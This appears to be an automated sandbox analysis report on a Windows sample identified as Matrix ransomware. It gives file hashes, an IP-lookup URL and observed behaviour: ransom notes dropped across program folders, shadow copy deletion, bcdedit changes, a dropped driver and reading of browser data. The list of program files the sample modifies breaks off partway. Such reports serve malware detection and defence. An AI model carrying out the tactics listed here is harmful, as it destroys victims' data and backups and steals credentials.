Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
28-12-2022 18:35
Static task
static1
Behavioral task
behavioral1
Sample
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
Resource
win10v2004-20220812-en
General
-
Target
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
-
Size
1.2MB
-
MD5
6411153c8a95e8c77127d99c75595604
-
SHA1
02e6b8baed744a6b0c78baddf1720654688e5642
-
SHA256
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3
-
SHA512
65f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade
-
SSDEEP
24576:+/SA+2lraRrjSJR5ezmT1dM9fB3NIDreFqO:yXlCIfe
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
Processes:
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exedescription ioc process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hu-hu\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\ProgramData\regid.1991-06.com.microsoft\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uk\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quc\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Resources\1033\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\VideoLAN\VLC\plugins\mux\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sv-se\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-tw\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fr-fr\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\VideoLAN\VLC\plugins\keystore\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\VideoLAN\VLC\plugins\access_output\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ro-ro\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-il\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-PT\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ky\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fi-fi\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\EBWebView\x64\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-ma\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\VideoLAN\VLC\plugins\gui\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\root\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fr\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hy\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\Java\jre1.8.0_66\lib\amd64\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\VideoLAN\VLC\plugins\control\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\Mozilla Firefox\fonts\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 4228 bcdedit.exe 5076 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 139 1392 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
t7bUFRUw64.exedescription ioc process File created C:\Windows\system32\Drivers\PROCEXP152.SYS t7bUFRUw64.exe -
Executes dropped EXE 3 IoCs
Processes:
NW1lWznw.exet7bUFRUw.exet7bUFRUw64.exepid process 1732 NW1lWznw.exe 1752 t7bUFRUw.exe 3636 t7bUFRUw64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
t7bUFRUw64.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" t7bUFRUw64.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\t7bUFRUw.exe upx C:\Users\Admin\AppData\Local\Temp\t7bUFRUw.exe upx behavioral2/memory/1752-167-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation wscript.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 29 IoCs
Processes:
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exedescription ioc process File opened for modification C:\Program Files\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Links\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-2295526160-1155304984-640977766-1000\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Public\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Music\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Public\Music\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Public\Documents\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Public\Videos\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exet7bUFRUw64.exedescription ioc process File opened (read-only) \??\K: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\A: t7bUFRUw64.exe File opened (read-only) \??\I: t7bUFRUw64.exe File opened (read-only) \??\K: t7bUFRUw64.exe File opened (read-only) \??\N: t7bUFRUw64.exe File opened (read-only) \??\H: t7bUFRUw64.exe File opened (read-only) \??\J: t7bUFRUw64.exe File opened (read-only) \??\T: t7bUFRUw64.exe File opened (read-only) \??\N: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\J: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\I: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\H: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\F: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\V: t7bUFRUw64.exe File opened (read-only) \??\R: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\P: t7bUFRUw64.exe File opened (read-only) \??\Q: t7bUFRUw64.exe File opened (read-only) \??\Y: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\V: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\U: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\T: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\S: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\O: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\M: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\L: t7bUFRUw64.exe File opened (read-only) \??\W: t7bUFRUw64.exe File opened (read-only) \??\X: t7bUFRUw64.exe File opened (read-only) \??\R: t7bUFRUw64.exe File opened (read-only) \??\Z: t7bUFRUw64.exe File opened (read-only) \??\Z: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\Q: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\E: t7bUFRUw64.exe File opened (read-only) \??\F: t7bUFRUw64.exe File opened (read-only) \??\M: t7bUFRUw64.exe File opened (read-only) \??\W: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\L: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\S: t7bUFRUw64.exe File opened (read-only) \??\Y: t7bUFRUw64.exe File opened (read-only) \??\E: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\B: t7bUFRUw64.exe File opened (read-only) \??\G: t7bUFRUw64.exe File opened (read-only) \??\X: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\P: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\G: 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened (read-only) \??\O: t7bUFRUw64.exe File opened (read-only) \??\U: t7bUFRUw64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 138 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Y14Gi9NT.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
Processes:
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exedescription ioc process File opened for modification C:\Program Files\AddWrite.TTS 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\javaws.exe 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\trdtv2r41.xsl 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_ok.gif 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pl_135x40.svg 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\plugin.jar 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Violet.xml 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-ul-phn.xrm-ms 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\PSS10R.CHM 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RADIAL\THMBNAIL.PNG 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\WindowsFormsIntegration.resources.dll 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.165.21\msedgeupdateres_el.dll 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ANTQUAI.TTF 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\ui-strings.js 